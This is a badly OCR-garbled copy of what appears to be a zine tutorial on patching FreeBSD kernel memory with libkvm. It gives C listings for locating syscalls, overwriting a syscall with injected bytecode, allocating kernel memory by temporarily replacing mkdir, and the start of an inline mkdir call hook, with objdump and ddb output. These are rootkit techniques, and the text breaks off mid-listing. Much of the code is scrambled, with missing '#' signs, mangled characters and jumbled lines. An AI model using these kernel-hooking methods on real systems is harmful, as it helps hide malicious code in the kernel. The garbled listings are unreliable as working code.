libkvm functions read the next paragraph and skip to the next section. 


Stephanie Wehner wrote a program called checkcall, which would check if 
sysent [CALL] had been tampered with, and if so would change it back to the 
original function. In order to help with the debugging during the latter 
sections of this article, we are going to make use of checkcall’s find 
system call functionality. Following is a stripped down version of 
checkcall, with just the find system call function. It is also a good 

xample to learn the basics of libkvm from. A line by line explanation of 
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the libkvm functions appears after the source code listing. 


find_syscall.c: 


Takes two arguments: the name of a syscall and corresponding number, 


where the syscall is located. 


If you enter the name of a syscall with an incorrect syscall number, 


Wehner’s checkcall.c,v 1.1.1.1 


/* 
* 
* and reports the location in memory 
* 
* 
* the output will be fubar. Too lazy to implement a check 
* 
* Based off of Stephani 
* 
* find_syscall.c,v 1.0 2005/05/20 
*/ 
include <stdio.h> 
include <fcntl.h> 
include <kvm.h> 
include <nlist.h> 
include <limits.h> 
include <sys/types.h> 
include <sys/sysent.h> 
include <sys/syscall.h> 
int main(int argc, char *argv[]) { 


char errbuf [_POSIX2_LINE_MAX]; 
kvm_t *kd; 

u_int32_t addr; 

int callnum; 

struct sysent call; 

struct nlist nl[] = { { NULL }, 


/* Check for the correct number 


if(arge != 3) { 


printf ("Usage:\n%s <name of system call> <syscall 


W \n\n", argv [0] 


printf("See /usr/src/sys/sys/syscall.h for syscal 


"W \n"); 


/* Find the syscall */ 


nl[0O].n_name = "sysent"; 
nli[{1l].n_name = argv[1]; 
callnum = atoi(argv[2]); 


printf("Finding syscall %d: %s\ 


{ NULL }, { NULL }, }; 


of arguments */ 


i 


n\n", callnum, argv[1]); 


/* Initialize kernel virtual memory access */ 


kd = kvm_openfiles (NULL, NULL, 


NULL, O_RDWR, errbuf); 


if(kd == NULL) { 
fprintf(stderr, "ERROR: 
exit (—1) ; 


} 
/* Find the addresses */ 


if (kvm_nlist (kd, nl) < 0) { 


$s\n", 


errbuf); 


l number>" 


ll numbers" 
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fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd)); 
exTe (-1) 3 


} 


if(!nl[0].n_value) { 

fprintf(stderr, "ERROR: %s not found (fubar?)\n" 
, nl[0O].n_name); 
exit (-1); 


} 
else { 


printf("%s is Ox%x at Ox%x\n", nl[0].n_name, nl1[0].n_type 


, nl[0O].n_value); 


} 


if(!nl[1l].n_value) { 


fprintf(stderr, "ERROR: %s not found\n", nl[1].n_name); 


exit (-1); 


/* Calculate the address */ 


addr = nl[0].n_value + callnum * sizeof(struct sysent); 


/* Print out location */ 


if (kvm_read(kd, addr, &é&call, sizeof(struct sysent)) < 0) 
fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd)); 
exit (-1); 


} 
else { 


{ 


printf ("sysent[%d] is at 0x%x and will execute function" 
"located at 0Ox%x\n", callnum, addr, call.sy_call); 


} 


if (kvm_close(kd) < 0) { 
fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd)); 
exe (-1); 


} 


exit (0); 


There are five functions from libkvm that are included in the above 


program; they are: 


kvm_openfiles 
kvm_nlist 
kvm_geterr 
kvm_read 
kvm_close 


kvm_openfiles: 


Basically kvm_openfiles initializes kernel virtual memory access, and 


returns a descriptor to be used in subsequent kvm library calls. 
find_syscall the syntax was as follows: 


kd = kvm_openfiles (NULL, NULL, NULL, O_RDWR, errbuf); 


In 


kd is used to store the returned descriptor, if after the call kd 


equals NULL then an error has occurred. 


The first three arguments correspond to const char *execfile, 


const 


char *corefile, and const char *swapfiles respectively. However for our 
purposes they are unnecessary, hence NULL. The fourth argument indicates 
that we want read/write access. The fifth argument indicates which buffer 
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to place any error messages, more on that later. 
kvm_nlist: 
The man page states that kvm_nlist retrieves the symbol table entries 
indicated by the name list argument (struct nlist). The members of struct 


nlist that interest us are as follows: 


char *n_name; /* symbol name (in memory) */ 
unsigned long n_value; /* address of the symbol */. 


Prior to calling kvm_nlist in find_syscall a struct nlist array was 
setup as follows: 


struct nlist nl[] = { { NULL }, { NULL }, { NULL }, }; 
nl[0O].n_name = "sysent"; 
nl[{1l].n_name = argv[1]; 


The syntax for calling kvm_nlist is as follows: 


kvm_nlist (kd, nl) 


What this did was fill out the n_value member of each element in the 
array nl with the starting address in memory corresponding to the value in 
n_name. In other words we now know the location in memory of sysent and the 
user supplied syscall (argv[1]). nl was initialized with three elements 
because kvm_nlist expects as its second argument a NULL terminated array of 
nlist structures. 


kvm_geterr: 


As stated in the man page this function returns a string describing the 
most recent error condition. If you look through the above source code 
listing you will see kvm_geterr gets called after every libkvm function, 
except kvm_openfiles. kvm_openfiles uses its own unique form of error 
reporting, because kvm_geterr requires a descriptor as an argument, which 
would not exist if kvm_openfiles has not been called yet. An example usag 
of kvm_geterr follows: 


fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd)); 
kvm_read: 


This function is used to read kernel virtual memory. In find_syscall 
the syntax was as follows: 


kvm_read(kd, addr, &call, sizeof(struct sysent) ) 

The first argument is the descriptor. The second is the address to 
begin reading from. The third argument is the user-space location to store 
the data read. The fourth argument is the number of bytes to read. 
kvm_close: 

This function breaks the connection between the pointer and the kernel 
virtual memory established with kvm_openfiles. In find_syscall this 
function was called as follows: 


kvm_close (kd) 


The following is an algorithmic explanation of find_syscall.c: 


1. Check to make sure the user has supplied a syscall name and 
number. (No error checking, just checks for two arguments) 

2. Setup the array of nlist structures appropriately. 

Initialize kernel virtual memory access. (kvm_openfiles) 

4. Find the address of sysent and the user supplied syscall. 
(kvm_nlist) 


Ww 
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5. Calculate the location of the syscall in sysent. 

6. Copy the syscall’s sysent structure from kernel-space to 
user-space. (kvm_read) 

7. Print out the location of the syscall in the sysent structure 


and the location of the executed function. 
8. Close the descriptor (kvm_close) 


In order to verify that the output of find_syscall is accurate, one can 
make use of ddb as follows: 


Note: The output below was modified in order to meet the 75 character per 
line requirement. 


[ ] 


ghost@slavetwo: “#l1s 

find_syscall.c 

ghost@slavetwo:” #gcc -o find_syscall find_syscall.c -lkvm 
ghost@slavetwo: “#ls 

find_syscall find_syscall.c 

ghost@slavetwo:”~#sudo ./find_syscal]l 

Password: 

Usage: 


./find_syscall <name of system call> <syscall number> 


See /usr/src/sys/sys/syscall.h for syscall numbers 
ghost@slavetwo:” #sudo ./find_syscall mkdir 136 
Finding syscall 136: mkdir 


sysent is 0x4 at 0xc06dc840 

sysent[136] is at Oxc06dcc80 and will execute function located at 
0xc0541900 

ghost@slavetwo:~#KDB: enter: manual escape to debugger 

[thread pid 12 tid 100004 ] 

Stopped at kdb_enter+0x32: leave 

db> examine/i 0xc0541900 

mkdir: pushl Sebp 


db> 
mkdirt+Oxl: movl Sesp, sebp 
db> c 


ghost@slavetwo:~# 


[ ] 


--[ 3.0 - Understanding Call Statements And Bytecode Injection 


In x86 Assembly a Call statement is a control transfer instruction, 
used to call a procedure. There are two types of Call statements Near and 
Far, for the purposes of this article one only needs to understand a Near 
Call. The following code illustrates the details of a Near Call statement 
(in Intel Syntax): 


0200 BB1295 MOV Bx, 9512 
0203 E8FA0O CALL 0300 
0206 B82F14 MOV AX,142F 


In the above code snippet, when the IP (Instruction Pointer) gets to 
0203 it will jump to 0300. The hexadecimal representation for CALL is E8, 
however FAOO is not 0300. 0x300 - 0x206 = OxFA. In a near call the IP 
address of the instruction after the Call is saved on the stack, so the 
called procedure knows where to return to. This explains why the operand 
for Call in this example is OxFA0O0O and not 0x300. This is an important 
point and will come into play later. 


One of the more entertaining things one can do with the libkvm 
functions is patch kernel virtual memory. As always we start with a very 
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Simple example ... Hello World! The following is a kld which adds a 
syscall that functions as a Hello World! program. 


hed Lowes 


/* 
* Prints "FreeBSD Rox!" 10 times 
* 


a7 


include <sys/types.h> 
include <sys/param.h> 
#include <sys/proc.h> 

include <sys/module.h> 
include <sys/sysent.h> 
include <sys/kernel.h> 
include <sys/systm.h> 


/* 
* The function for implementing the syscall. 


*/ 


static int 
hello (struct thread *td, void *arg) 
{ 


printf ("FreeBSD Rox!\n"); 
printf ("FreeBSD Rox!\n"); 
printf ("FreeBSD Rox!\n"); 
printf ("FreeBSD Rox!\n"); 
printf ("FreeBSD Rox!\n"); 
printf ("FreeBSD Rox!\n"); 
printf ("FreeBSD Rox!\n"); 
printf ("FreeBSD Rox!\n"); 
printf ("FreeBSD Rox!\n"); 
printf ("FreeBSD Rox!\n"); 
return 0; 
} 
/* 
* The ‘sysent’ for the new syscall 
Kf 
static struct sysent hello_sysent = { 
0, /* sy_narg */ 
hello /* sy_call */ 
}; 
/* 


* The offset in sysent where the syscall is allocated. 
Fe. 


static int offset = 210; 


/* 
* The function called at load/unload. 


ay 


static int 
load (struct module *module, int cmd, void *arg) 
{ 


int error = 0; 


switch (cmd) { 

case MOD_LOAD 
printf ("syscall loaded at %d\n", offset); 
break; 

case MOD_UNLOAD 
printf ("syscall unloaded from %d\n", offset); 


7.txt Wed Apr 26 09:43:45 2017 7 


break; 

default 
error = EOPNOTSUPP; 
break; 


return error; 


SYSCALL_MODULE (hello, &o0ffset, &hello_sysent, load, NULL); 


The following is the user-space program for the above kld: 


interface.c: 


include <stdio.h> 
include <sys/syscall.h> 
include <sys/types.h> 
include <sys/module.h> 


int main(int argc, char **argv) { 


return syscall(210); 


If we compile the above kld using a standard Makefile, load it, and 
then run the user-space program, we get some very annoying output. In order 
to make this syscall less annoying we can use the following program. As 
before an explanation of any new functions and concepts appears after the 
source code listing. 


test_call.c: 


/* 
* Test understanding of call statement: 

* Operand for call statement is the difference between the called function 
* and the address of the instruction following the call statement. 

* 

* Tested on syscall hello. Normally prints out "FreeBSD Rox!" 10 times, 

* after patching only prints it out once. 

* 

* test_call.c,v 2.1 2005/06/15 

*/ 


include <stdio.h> 
include <fcntl.h> 
include <kvm.h> 
include <nlist.h> 
include <limits.h> 
include <sys/types.h> 


/* 
* Offset of string to be printed 
* Starting at the beginning of the syscall hello 
xf 


ra 
H 
me 


#define OFFS! Oxed 


/* 
* Offset of instruction following call statement 


A 


#define OFFSET_2 Ox12 


/* 
* Replacement code 


*/ 
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unsigned char code[] = 


M\ x55" /* push %ebp 
"\x89\xe5" /* mov sesp, sebp 
"\x83\xec\x04" /* sub S0x4,%esp 
"\xc7\x04\x24\x00\x00\x00\x00" /* movl SO, (%esp) 
"\xe8\x00\x00\x00\x00" /* call printf 
"\xcg" /* leave 
"\x31\xc0O" /* xor Seax, eax 
"\xc3" /* ret 


"\x8d\xb4\x26\x00\x00\x00\x00" =/* lea 0x0 (%esi),%esi 
"\x8d\xbc\x27\x00\x00\x00\x00"; /* lea 0x0 (edi), edi 


int main(int argc, char *argv[]) { 


char errbuf [_POSIX2_LINE_MAX]; 

kvm_t *kd; 

u_int32_t offset_l; 

u_int32_t offset_2; 

struct nlist nl[{] = { { NULL }, { NULL }, { NULL }, }; 


/* Initialize kernel virtual memory access */ 


kd = kvm_openfiles (NULL, NULL, NULL, O_RDWR, errbuf); 

if(kd == NULL) { 
fprintf(stderr, "ERROR: %s\n", errbuf); 
exit (-1); 


/* Find the address of hello and printf */ 


nl[0O].n_name = "hello"; 
nl[1l].n_name = "printf"; 


if(kvm_nlist(kd, nl) < 0) { 
fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd)); 
exit (-1); 


} 


if(!nl[0O].n_value) { 

fprintf(stderr, "ERROR: Symbol %s not found\n" 
, nl[0O].n_name); 
exit(-1); 


if(!nl[1].n_value) { 

fprintf(stderr, "ERROR: Symbol %s not found\n" 
, nif1l].n_name); 
exTt(—l)y 


/* Calculate the correct offsets */ 


offset_1 = nl[0].n_value + OFFSE 
offset_2 nl[{0].n_value + OFFSET_2; 


/* Set the code to contain the correct addresses */ 


*(unsigned long *) &code[9] = offset_1; 
*(unsigned long *)&code[14] = nl[1].n_value - offset_2; 


/* Patch hello */ 
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if (kvm_write (kd, nl[0].n_value, code, sizeof(code)) < 0) { 
fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd)); 
exit (-1); 


} 


printf("Luke, I am your father!\n"); 


/* Close kd */ 


if (kvm_close(kd) < 0) { 
fprintf(stderr, 
exti(-L) ; 


ERROR: %s\n", kvm_geterr(kd)); 


} 


exit (0); 


The only libkvm function that is included in the above program that 
hasn’t been discussed before is kvm_write. 


kvm_write: 


This function is used to write to kernel virtual memory. In test_call 
the syntax was as follows: 


kvm_write (kd, nl[0].n_value, code, sizeof (code) ) 


The first argument is the descriptor. The second is the address to 
begin writing to. The third argument is the user-space location to read 
from. The fourth argument is the number of bytes to read. 


The replacement code (bytecode) in test_call was generated with help of 
objdump. 


[ ] 


ghost@slavetwo:” #objdump -DR hello.ko | less 


hello.ko: file format elf32-1i1386-freebsd 


Disassembly of section -.hash: 


00000094 <.hash>: 


94: 11 00 adc Seax, (Seax) 
96: 00 00 add Sal, (Seax) 


OUTPUT SNIPPED 


Disassembly of section .text: 


00000500 <hello>: 


500: 55 push Sebp 

501: 89 e5 mov Sesp, sebp 

503: 83 ec 04 sub S0x4,%esp 

506: c7 04 24 ed 05 00 00 movl SOx5ed, (Sesp) 
509: R_386_RELATIVE *ABS* 

50d: e8 fc ff ff ff call 50e <hellot+t0Oxe> 
50e: R_386_PC32 printf 

512: c7 04 24 ed 05 00 00 movl SOx5ed, (Sesp) 
515: R_386_RELATIVE *ABS* 

51.94 e8 fc ff ff ff call 5la <hellot+0Oxla> 
5la: R_386_PC32 printf 

5le: c7 04 24 ed 05 00 00 movl SOx5ed, (Sesp) 
521: R_386_RELATIVE *ABS* 

525: e8 fc ff ff ff call 526 <hellot+0x26> 
526: R_386_PC32 printf 
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OUTPUT SNIPPED 


576% cI leave 

OL 31. 0 xor Seax, eax 

581: c3 ret 

582: 8d b4 26 00 00 00 OOD lea 0x0 (Sesi),%esi 
589: 8d be 27 00 00 00 O00 lea 0x0 (Sedi) , sedi 


[ ] 


Note: Your output may vary depending on your compiler version and flags. 


Comparing the output of the text section with the bytecode in test_call 
one can see that they are essentially the same, minus setting up nine more 
calls to printf. An important item to take note of is when objdump reports 
something as being relative. In this case two items are; movl $0x5ed, (%esp) 
(sets up the string to be printed) and call printf. Which brings us to 


In test_call there are two #define statements, they are: 


define OFFS! 
define OFFS 


Tod Oxed 
2 0x12 


GC] Fl 


The first represents the address of the string to be printed relative 
to the beginning of syscall hello (the number is derived from the output of 
objdump). While the second represents the offset of the instruction 
following the call to printf in the bytecode. Later on in test_call there 
are these four statements: 


/* Calculate the correct offsets */ 


offset_1 = nl1[0].n_value + OFFS 
offset_2 nl[0O].n_value + OFFS 


Le eel 


/* Set the code to contain the correct addresses */ 


*(unsigned long *)&code[9] = offset_1; 
*(unsigned long *)&code[14] = nl[1].n_value - offset_2; 


From the comments it should be obvious what these four statements do. 
code[9] is the section in bytecode where the address of the string to be 
printed is stored. code[14] is the operand for the call statement; address 
of printf - address of the next statement. 


The following is the output before and after running test_call: 


[ ] 


ghost@slavetwo: “#ls 
Makefile hello.c interface.c test_call.c 
ghost@slavetwo: ~#make 


Warning: Object directory not changed from original /usr/home/ghost 
@ -> /usr/src/sys 
machine -> /usr/src/sys/i386/include 


OUTPUT SNIPPED 


J% objcopy % hello.kld 

ld -Bshareabl d -warn-common -o hello.ko hello.kld 
objcopy strip-debug hello.ko 

ghost@slavetwo:” #sudo kldload ./hello.ko 

Password: 

syscall loaded at 210 

ghost@slavetwo:”~#gcc -o interface interface.c 
ghost@slavetwo:”~ #./interface 


FreeBSD Rox! 
FreeBSD Rox! 
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FreeBSD Rox! 
FreeBSD Rox! 
FreeBSD Rox! 
FreeBSD Rox! 
FreeBSD Rox! 
FreeBSD Rox! 
FreeBSD Rox! 
FreeBSD Rox! 
ghost@slavetwo:”~#gcc -o test_call test_call.c -lkvm 
ghost@slavetwo:~#sudo ./test_call 
Luke, I am your father! 
ghost@slavetwo:~ #./interface 
FreeBSD Rox! 
ghost@slavetwo:~ 
[ 

--[ 4.0 - Allocating Kernel Memory 

Being able to just patch kernel memory has its limitations since you 


don’t have much room to pl 
alleviates this problem. 


kmalloc.c: 


/* 


lay with. Being able to all 


locate kernel memory 


The following is a kld which does just that. 


* Module to allow a non-privileged user to allocate kernel memory 


kmalloc.c,v 2.0 2005/06/01 
Date Modified 2005/06/14 


say 


lude 
lude 
lude 
lude 
lude 
lude 
lude 
lude 


Nc 
Nc 
Nc 
Nc 
Nc 
Nc 
Nc 
Nc 


Pepe pe pe pe pe pe 


/* 


<sys/types.h> 
<sys/param.h> 
<sys/proc.h> 
<sys/module.h> 
<sys/sysent.h> 
<sys/kernel.h> 
<sys/systm.h> 

<sys/malloc.h> 


* Arguments for kmalloc 


/, 


struct kma_struct { 


}; 


struct kmalloc_args { struct kma_struct *kma; 


/* 


unsigned 
unsigned 


long size; 
long *addr; 


}; 


* The function for implementing kmalloc. 


a7, 


static int 
kmalloc 


int error = 


(struct thread *td, 


1; 


struct kma_struct kts; 


if (uap->kma) 


MALLOC (kts.addr, 
, M_TEMP, 


struct kmalloc_args 


unsigned long*, 
M_NOWAIT) ; 


*xuap) { 


uap->kma->size 
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error = copyout(&kts, uap->kma, sizeof(kts)); 


return (error); 


/* 
* The ‘sysent’ for kmalloc 
«7. 
static struct sysent kmalloc_sysent = { 
Ty /* sy_narg */ 
kmalloc /* sy_call */ 
}; 
/* 


* The offset in sysent where the syscall is allocated. 
i 


static int offset = 210; 


/* 
* The function called at load/unload. 


Af. 


static int 
load (struct module *module, int cmd, void *arg) 
{ 


int error = 0; 


switch (cmd) { 
case MOD_LOAD 


uprintf ("syscall loaded at %d\n", offset); 
break; 

case MOD_UNLOAD 
uprintf ("syscall unloaded from %d\n", offset); 
break; 


default 
error = EOPNOTSUPP; 
break; 


return error; 


SYSCALL_MODULE (kmalloc, é&offset, &kmalloc_sysent, load, NULL); 


The following is the user-space program for the above kld: 
interface.c: 


/* 
* User Program To Interact With kmalloc module 


*/ 


include <stdio.h> 
include <sys/syscall.h> 
include <sys/types.h> 
include <sys/module.h> 


struct kma_struct { 


unsigned long size; 
unsigned long *addr; 


}; 
int main(int argc, char **argv) { 


struct kma_struct kma; 
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if(arge != 2) { 
printf ("Usage:\n%s <size>\n", argv[0]); 
exit (0); 

} 

kma.size = (unsigned long) atoi(argv[1]); 


return syscall(210, &kma); 


Using the techniques/functions described in the previous two sections 
and the following algorithm coined by Silvio Cesare one can allocate kernel 
memory without the use of a kld. 


Silvio Cesare’s kmalloc from user-space algorithm: 


Get the address of some syscall 
Write a function which will allocate kernel memory 
Save sizeof(our_function) bytes of some syscall 
Overwrite some syscall with our_function 

Call newly overwritten syscall 
Restore syscall 


NOP WNE 


test_kmalloc.c: 


/ 


Allocate kernel memory from user-space 


Algorithm to allocate kernel memory is as follows: 


1. Get address of mkdir 

Overwrite mkdir with function that calls man 9 malloc() 

Call mkdir through int $0x80 

This will cause the kernel to run the new "mkdir" syscall, which will 
call man 9 malloc() and pass out the address of the newly allocated 
kernel memory 

4. Restore mkdir syscall 


i) 


test_kmalloc.c,v 2.0 2005/06/24 


+ ££ + FF F F FF FF F F F OF 
QW 


/ 


nclude <stdio.h> 
nclude <fcntl.h> 
nclude <kvm.h> 

nclude <nlist.h> 
nclude <limits.h> 
nclude <sys/types.h> 
nclude <sys/syscall.h> 
nclude <sys/module.h> 


ee ee ee ee 


/* 
* Offset of instruction following call statements 
* Starting at the beginning of the function kmalloc 


KY, 

define OFFSET_1 Ox3a 
define OFFSET _2 0x56 
/* 

* kmalloc function code 

a 


unsigned char code[] = 
"\ x55" /* push sebp Ky, 
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"\ xba\x01\x00\x00\x00" /* mov 
"\x89\xe5" /* mov 
W\ x53" /* push 
"\x83\xec\x14" /* sub 
"\x8b\x5d\x0c" /* mov 
"\x8b\x03" /* mov 
"\x85\xcO" /* test 
"\x75\x0b" /* Jne 
"\x83\xc4\x14" /* add 
"\x89\xd0" /* mov 
"\x5b" /* pop 
"\xcg" /* leave 
"\xe3" /* ret 
"\x8d\x76\x00" /* lea 
"\xc7\x44\x24\x08\x01\x00\x00" /* movl 
Ww \x00" 

"\xc7\x44\x24\x04\x00\x00\x00" /* movl 
Ww \x00" 

"\x8b\x00" /* mov 
"\x89\x04\x24" /* mov 
"\xe8\xfc\xff\xff\xffi" /*®* call 
"\x89\x45\xf8" /* mov 
"\xc7\x44\x24\x08\x08\x00\x00" /* movl 
Ww \x00" 

"\x8b\x03" /* mov 
"\x89\x44\x24\x04" /* mov 
"\x8d\x45\xf4" /* lea 
"\x89\x04\x24" /* mov 
"\xe8\xfc\xff\xff\xffi" /* call 
"\x83\xc4\x14" /* add 
"\x89\xc2" /* mov 
"\x5b" /* pop 
"\xcg" /* leave 
"\x89\xd0" /* mov 
"Xx c3" /* ret 


* struct used to store kernel address 


*/ 


struct kma_struct { 


}; 


int main(int argc, 


unsigned long size; 


unsigned long *addr; 


INty 2 = 0¢ 


char errbuf[_POSIX2_LIN 


kvm_t *kd; 


char **argv) 


Want 32 
u_int32_ 
struct n 


struct k 


if(arge 


t offset_1l; 
t offset_2; 
list nl[] = 


{ 


SOx1, %edx 
Sesp, sebp 

Sebx 
$0x14,%esp 

Oxc (Sebp) , sebx 
(Sebx) , Seax 
Seax, Se€ax 


20 <kmalloc+0x20> 


$0x14,%esp 
Sedx, eax 
Sebx 


0x0 (%esi),%tesi 
S0Ox1,0x8 (%esp) 
$0x0, 0x4 (%esp) 


(Seax) , Sax 
seax, (Sesp) 


36 <kmalloc+0x36> 
seax, Oxfffffff8 (Sebp) 


$0x8,0x8 (Sesp) 


(Sebx) , eax 
Seax, 0x4 (Sesp) 


Oxfffffff4 (sebp) , seax 


Seax, (SeESp) 


52 <kmalloc+0x52> 


$0x14,%esp 
Seax, 5edx 
Sebx 


Sedx, seax 


{{ NULL },{ NULL },{ NULL },{ NULL },{ NULL },}; 
unsigned char origcode[sizeof (code) ]; 


ma_struct kma; 


t= 2) { 


printf ("Usage:\n%s <size>\n", 


exit (0); 


argv[0]); 


/* Initialize kernel virtual memory access */ 
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kd = kvm_openfiles (NULL, NULL, NULL, O_RDWR, errbuf); 
if(kd == NULL) { 

fprintf(stderr, "ERROR: %s\n", errbuf); 

exit (-1); 
} 
/* Find the address of mkdir, M_TEMP, malloc, and copyout */ 
nl[0].n_name = "mkdir"; 
nl[1l].n_name = "M_TEMP"; 
nl[2].n_name = "malloc"; 
nl[3].n_name = "copyout"; 
if(kvm_nlist(kd, nl) < 0) { 

fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd)); 


exit (-1); 


for (aS Opt << des Atay og 
if(!nl[i].n_value) { 


fprintf(stderr, "ERROR: 


Symbol %s not found\n" 


, nl[i].n_name); 


exit (-1); 


/* Calculate the correct offsets */ 


offset_1 = nl[0].n_value + OFFSET_1; 

offset_2 = nl[0].n_value + OFFSET_2; 

/* Set the code to contain the correct addresses */ 
*(unsigned long *) &code[44] = nl[1].n_value; 

*(unsigned long *) &code[54] = nl[2].n_value - offset_1; 
*(unsigned long *)&code[82] = nl[3].n_value - offset_2; 


/* Save mkdir syscall */ 


if (kvm_read(kd, nl[0].n_value, origcode, sizeof(code)) < 0) { 
fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd)); 


exit (-1); 


/* Patch mkdir */ 


if (kvm_write (kd, nl[0].n_value, 
fprintf(stderr, "ERROR: 
exit (-1); 


code, 
$s\n", 


/* Allocate kernel memory */ 


kma.size = (unsigned long) atoi(argv[1] 
syscall(136, &kma); 


printf("Address of kernel memory: 


/* Restore mkdir */ 


if (kvm_write (kd, nl[0].n_value, 


OxSx\n", 


origcode, 


sizeof(code)) < 0) { 
kvm_geterr(kd)); 


i 


kma.addr) ; 


sizeof(code)) < 0) { 
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fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd)); 
exTe (-1) 3 


/* Close kd */ 


if(kvm_close(kd) < 0) { 


} 


fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd)); 
exit(-1); 


exit (0); 


} 


Using ddb one can verify the results of the above program as follows: 


[ 


./test_kmalloc <size> 


] 


ghost@slavetwo: “#l1ls 

test_kmalloc.c 

ghost@slavetwo:” #gcc -o test_kmalloc test_kmalloc.c -lkvm 
ghost@slavetwo:”~#sudo ./test_kmalloc 

Usage: 


ghost@slavetwo:”~#sudo ./test_kmalloc 10 
Address of kernel memory: 0xc2580870 
ghost@slavetwo:”~#KDB: enter: manual escape to debugger 
[thread pid 12 tid 100004 ] 

Stopped at kdb_enter+0x32: leave 
db> examine/x 0xc2580870 

0xc2580870: 70707070 

db> 

0xc2580874: 70707070 

db> 

0xc2580878: dead7070 

db> c 


ghost@slavetwo: ~ # 


[ 


--[ 5.0 - Putting It All Together 


Knowing how to patch and allocate kernel memory gives one a lot of 


freedom. 


This last section will demonstrate how to apply a call hook using 
the techniques described in the previous sections. 


ypically call hooks on 


FreeBSD are done by changing the sysent and having it point to another 


function, 
algorithm 


dis 
2. 


we will not be doing this. Instead we will be using the following 


(with a few minor twists, shown later): 


Copy syscall we want to hook 

Allocate kernel memory (use technique described in previous 
section) 

Place new routine in newly allocated address space 

Overwrite first 7 bytes of syscall with an instruction to jump 
to new routine 

Execute new routine, plus the first x bytes of syscall (this 
step will become clearer later) 

Jump back to syscall + offset 

Where offset is equal to x 


Stealing an idea from pragmatic of THC we will hook mkdir to print out 


a debug message. The following is the kld used in conjunction with objdump 
in order to extract the bytecode required for the call hook. 


hacked_mkdir.c: 
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* mkdir call hook 
* 


Prints a simple debugging message 


*/ 


nclude <sys/types.h> 
nclude <sys/param.h> 
nclude <sys/proc.h> 
nclude <sys/module.h> 
nclude <sys/sysent.h> 
nclude <sys/kernel.h> 
nclude <sys/systm.h> 
nclude <sys/linker.h> 
nclude <sys/sysproto.h> 
nclude <sys/syscall.h> 


Pepe pe pe pe pe pe pe pe 


/* The hacked system call */ 


static int 
hacked_mkdir (struct proc *p, struct mkdir_args *uap) { 


uprintf ("MKDIR SYSCALL : %s\n", uap->path); 
return 0; 


/* The sysent for the hacked system call */ 


static struct sysent 
hacked_mkdir_sysent = { 
1; /* sy_narg */ 
hacked_mkdir /* sy_call */ 
}; 


/* The offset in sysent where the syscall is allocated */ 


static int offset = NO_SYSCALL; 


/* The function called at load/unload */ 


static int 
load (struct module *module, int cmd, void *arg) { 
int error = 0; 


switch (cmd) {f{ 
case MOD_LOAD 


uprintf ("syscall loaded at %d\n", offset); 
break; 

case MOD_UNLOAD : 
uprintf ("syscall unloaded from %d\n", offset); 
break; 


default 
error = EINVAL; 
break; 


return error; 


SYSCALL_MODULE (hacked_mkdir, és&offset, &hacked_mkdir_sysent, load, NULL); 


The following is an example program which hooks mkdir to print out a 
simple debug message. As always an explanation of any new concepts appears 


7.txt 


after the source code listing. 
test_hook.c: 

ip 
executing mkdir. 


Algorithm is as follows: 


Allocate kernel memory. 


Intercept mkdir system call, 


Wed Apr 26 09:43:45 2017 


18 


printing out a debug message befor 


2 
3. Place new routine 
4 


to new routine. 
5. Execute new routine, 


Wher 


offset is 


+ + + + + + + FF FF FF F FF F F F F OF 


/ 


nclude <stdio.h> 
nclude <fcntl.h> 
nclude <kvm.h> 

nclude <nlist.h> 
nclude <limits.h> 
nclude <sys/types.h> 
nclude <sys/syscall.h> 
nclude <sys/module.h> 


ee ee ee ee 


/* 


* Offset of instruction following call 


test_hook.c,v 3.0 2005/07/02 


statements 


1. Copy mkdir syscall upto but not including \xe8. 


in newly allocated address space. 
Overwrite first 7 bytes of mkdir syscall with an instruction to jump 


plus the first x bytes of mkdir syscall. 
Where x is equal to the number of bytes copied from step 1. 

6. Jump back to mkdir syscall + offset. 

qual to the location of \xe8. 


* Starting at the beginning of the function kmalloc 


x 
define KM_OFFSET_1 Ox3a 
define KM_OFFSET_2 0x56 


/* 
* kmalloc function code 


i 


unsigned char km_code[] = 


M\ x55" pn 
"\ xba\x01\x00\x00\x00" fe 
"\x89\xe5" /* 
"\ x53" ia 
"\x83\xec\x14" /* 
"\x8b\x5d\x0c" 1% 
"\x8b\x03" Ae 
"\x85\xcO" fc® 
"\x75\x0b" i 
"\x83\xc4\x14" /* 
"\x89\xdo" /* 
"\x5b" ae 
"\xcQ" iis 
"\xc3" /* 
"\x8d\x76\x00" /* 
"\xc7\x44\x24\x08\x01\x00\x00" /* 
Ww \x00" 

"\xc7\x44\x24\x04\x00\x00\x00" /* 
Ww \x00" 

"\x8b\x00" /* 
"\x89\x04\x24" /* 
"\xe8\xfc\xff\xff\xffi" /* 


sebp 

SOx1, %edx 
Sesp, sebp 

Sebx 
$0x14,%esp 

Oxc (Sebp) , sebx 
(Sebx) , eax 
Seax, Se€ax 

20 <kmalloc+0x20> 
$0x14,%esp 
Sedx, seax 

Sebx 


0x0 (%esi), %tesi 
SOx1,0x8 (%esp) 
$0x0, 0x4 (Sesp) 
(Seax) , Sax 


seax, (esp) 
36 <kmalloc+0x36> 
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"\x89\x45\xf8" /* mov seax, Oxfffffff8(sebp) */ 
"\xc7\x44\x24\x08\x08\x00\x00" /* movl S$0x8,0x8 (Sesp) * / 
"\x00" 
"\x8b\x03" /* mov (%ebx) , eax * / 
"\x89\x44\x24\x04" /* mov eax, 0x4 (Sesp) * / 
"\x8d\x45\xf4" /* lea Oxfffffff4 (sebp) ,%eax */ 
"\x89\x04\x24" /* mov $eax, (SeSp) x / 
"\xe8\xfc\xff\xff\xfti" /* call 52 <kmalloct+0x52> * / 
"\x83\xc4\x14" /* add $0x14,%esp * / 
"\x89\xc2" /* mov Seax, sedx * / 
"\x5b" /* pop Sebx */ 
"\xcQ" /* leave ay 
"\x89\xd0o" /* mov Sedx, eax * / 
WN Seal /* ret * i: 
/* 
* Offset of instruction following call statements 
* Starting at the beginning of the function hacked_mkdir 
oy: 
#define HA OFFSET 1 Ox2f 
/* 
* hacked_mkdir function code 
ay 
unsigned char ha_code[] = 
"\x4dq" /* M * / 
"\x4b" /* K * / 
"\x4qn /* D e/ 
"\x4g9" /* I a 
"\x52" /* R */ 
